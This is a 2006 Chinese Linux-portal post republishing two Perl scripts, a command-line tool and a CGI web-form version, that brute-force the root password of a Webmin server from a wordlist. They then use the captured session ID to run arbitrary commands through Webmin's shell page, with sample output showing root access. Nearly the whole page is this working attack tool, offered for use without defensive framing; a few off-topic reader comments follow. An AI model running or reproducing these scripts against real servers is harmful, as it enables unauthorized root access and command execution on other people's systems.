红联Linux门户
Linux帮助
当前位置: 红联Linux门户 > Linux技术与应用

Webmin 暴力破解+ 执行命令

发布时间:2006-03-30 00:05:24来源:红联作者:linux
Webmin是一个广泛使用的,运行在linux/unix下,用浏览器来管理系统的工具。用它,你不必知道复杂的命令行,也不用了解各种复杂的配置文件,系统管理变得非常简单!可以设置帐号,配置DNS和文件共享等.

Webmin BruteForce + Command execution v1.5

#!/usr/bin/perl
################################################################################
# Webmin BruteForce + Command execution
# v1.0:By Di42lo - _2@012.net.il">DiAblo_2@012.net.il
# v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
################################################################################
#add script:
#1.wordlist func.
#2.log (line:41)
################################################################################
# usage:
# ./webmin1.pl
#./webmin1.pl 192.168.0.5 "uptime" wordlist.txt
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host once again
# [+] Connected.. Sending Buffer
# [+] Buffer sent...running command uptime
# root logged into Webmin 1.170 on linux (SuSE Linux 9.1)
# 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01
################################################################################
use IO::Socket;
if (@ARGV<3){
print "Webmin BruteForcer v1.5\n";
print "usage:\n";
print " webmin15.pl \n";
print "example:\n";
print " webmin15.pl www.abcd.com \"id\" wordlist.txt\n";
exit;
}
my $host=$ARGV[0];
my $cmd=$ARGV[1];
my $wlist=$ARGV[2];
open (data, "$wlist");
@wordlist=;
close data;
$passx=@wordlist;
open(results , ">$host.log");
print results "#############################\n";
print results "Webmin BruteForce + Command execution v1.5\n";
print results "Host:$host\n";
print results "#############################\n";
my $chk=0;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout => 10);
if(!$sock){
print "[-] Webmin on this host does not exist\n";
print results "[-] Webmin on this host does not exist\n";
exit;
}else{
$sock->close;
print "[+] BruteForcing...\n";
}
my $sid;
$n=0;
while ($chk!=1) {
$n++;
if($n>$passx){
exit;
}
$pass=@wordlist[$passx-$n];
my $pass_line="page=%2F&user=root&pass=$pass";
my $buffer="POST /session_login.cgi HTTP/1.0\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/\n".
"Cookie: testing=1\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: __\n".
"\n".
$pass_line."\n\n";
my $line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",
PeerPort => "10000",Timeout => 10);
if ($sock){
print "[+] trying to enter with: $pass\n";
print $sock $buffer;
while ($answer=<$sock>){
if ($answer=~/sid=(.*);/g){
$chk=1;
$sid=$1;
print "[+] Found SID : $sid\n";
print "[+] Password : $pass\n";
print results "[+]:Password:$pass\nSid:$sid\n";
}
}
}
$sock->close;
print results "[-]$pass\n";
}
print "[+] Connecting to host once again\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
=> "10000",Timeout => 10);
if(!$sock){
print "[-] Cant Connect once again for command execution\n";
print results "[-] Cant Connect once again for command execution\n";
}
print "[+] Connected.. Sending Buffer\n";
my $temp="-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"cmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
my $buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/shell/\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data;
boundary=---------------------------19777347561180971495777867604\n".
"Content-Length: siz\n".
"\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock){
print "[+] Buffer sent...running command $cmd\n";
print $sock $buffer;
while ($answer=<$sock>){
if ($answer=~/defaultStatus="(.*)";/g) { print $1."\n";}
if ($answer=~/
>/g){

$cmd_chk=1;

}

if ($cmd_chk==1) {

if ($answer=~/<\/pre><\/td><\/tr>/g){

exit;

} else {

print $answer;

print results "[+]$answer\n";

}

}

}

}

#!/usr/bin/perl



use CGI qw(:standard);

use IO::Socket;

$CGI::HEADERS_ONCE = 1;

$CGI = new CGI;



$atak = $CGI->param("atak");

$host = $CGI->param("host");

$wlist = $CGI->param("wlist");

$cmd = $CGI->param("cmd");



print $CGI->header(-type=>'text/html',-charset=>'windows-1254');

print qq~charset=ISO-8859-9>Webmin Web Brute Force v1.5 - cgi
<br>versiyon

Webmin Web Brute Force v1.5 - cgi versiyon




Webmin BruteForce + Command execution- cgi version


v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il


v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com


~;

if($atak eq "webmin") {

open (data, "$wlist");

@wordlist=;

close data;

$passx=@wordlist;

$chk=0;

$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",

PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not

exist\r\n";

$sock->close;

print "[+] BruteForcing...
";

$sid;

$n=0;

while ($chk!=1) {

$n++;

if($n>$passx){

exit;

}

$pass=@wordlist[$passx-$n];

$pass_line="page=%2F&user=root&pass=$pass";

$buffer="POST /session_login.cgi HTTP/1.0\n".

"Host: $host:10000\n".

"Keep-Alive: 300\n".

"Connection: keep-alive\n".

"Referer: http://$host:10000/\n".

"Cookie: testing=1\n".

"Content-Type: application/x-www-form-urlencoded\n".

"Content-Length: __\n".

"\n".

$pass_line."\n\n";

$line_size=length($pass_line);

$buffer=~s/__/$line_size/g;

$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",

PeerPort => "10000",Timeout => 25);

if ($sock){

print "[+] Denenen sifre: $pass
";

print $sock $buffer;

while ($answer=<$sock>){

if ($answer=~/sid=(.*);/g){

$chk=1;

$sid=$1;

print "[+] Found SID : $sid
";

print "[+] Sifre : $pass
";

}

}

}

$sock->close;

}

print "[+] Connecting to host once again
";

$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort

=> "10000",Timeout => 10) || die "[-] Cant Connect once again for command

execution\n";

print "[+] Connected.. Sending Buffer
";

$temp="-----------------------------19777347561180971495777867604\n".

"Content-Disposition: form-data; name=\"cmd\"\n".

"\n".

"$cmd\n".

"-----------------------------19777347561180971495777867604\n".

"Content-Disposition: form-data; name=\"pwd\"\n".

"\n".

"/root\n".

"-----------------------------19777347561180971495777867604\n".

"Content-Disposition: form-data; name=\"history\"\n".

"\n".

"\n".

"-----------------------------19777347561180971495777867604\n".

"Content-Disposition: form-data; name=\"previous\"\n".

"\n".

"$cmd\n".

"-----------------------------19777347561180971495777867604\n".

"Content-Disposition: form-data; name=\"pcmd\"\n".

"\n".

"$cmd\n".

"-----------------------------19777347561180971495777867604--\n\n";

$buffer_size=length($temp);

$buffer="POST /shell/index.cgi HTTP/1.1\n".

"Host: $host:10000\n".

"Keep-Alive: 300\n".

"Connection: keep-alive\n".

"Referer: http://$host:10000/shell/\n".

"Cookie: sid=$sid\; testing=1; x\n".

"Content-Type: multipart/form-data;

boundary=---------------------------19777347561180971495777867604\n".

"Content-Length: siz\n".

"\n".

$temp;

$buffer=~s/siz/$buffer_size/g;

print $sock $buffer;



if ($sock){

print "[+] Buffer sent...running command $cmd
";

print $sock $buffer;

while ($answer=<$sock>){

if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";}

if ($answer=~/
>/g){

$cmd_chk=1;

}

if ($cmd_chk==1) {

if ($answer=~/<\/pre><\/td><\/tr>/g){

exit;

} else {

print $answer;

}

}

}

}

}



if($atak eq ""){

print qq~

type=hidden name=atak value=webmin>






Webmin Web Brute Force v1.5 - cgi

version


Server:value="www.">


Wordlist:name="wlist">align="left">Examples:
---------
admin
administrator
redhat
mandrake
suse


Cmd:value="uptime">


value="Gooooooo!">


~;
文章评论

共有 5 条评论

  1. 李继飞 于 2009-11-27 19:39:36发表:

    刚刚接触linux,在网上四处搜索学习,却无意中撞到这里来了,还请多多指教
    容和 发表于 2009-7-29 00:32
    欢迎,欢迎

  2. 李继飞 于 2009-11-27 19:39:32发表:

    刚刚接触linux,在网上四处搜索学习,却无意中撞到这里来了,还请多多指教
    容和 发表于 2009-7-29 00:32
    欢迎,欢迎

  3. 李继飞 于 2009-11-27 19:39:23发表:

    刚刚接触linux,在网上四处搜索学习,却无意中撞到这里来了,还请多多指教
    容和 发表于 2009-7-29 00:32
    欢迎,欢迎

  4. 李继飞 于 2009-11-27 19:39:18发表:

    看不懂了

  5. otwett 于 2009-11-27 08:36:12发表:

    看不懂楼主什么意思,还是使用命令行管理吗

频道文章

最新教程

随机推荐

关于我们 | 合作 | 联系我们

© linuxdiyf.com 红联Linux门户 版权所有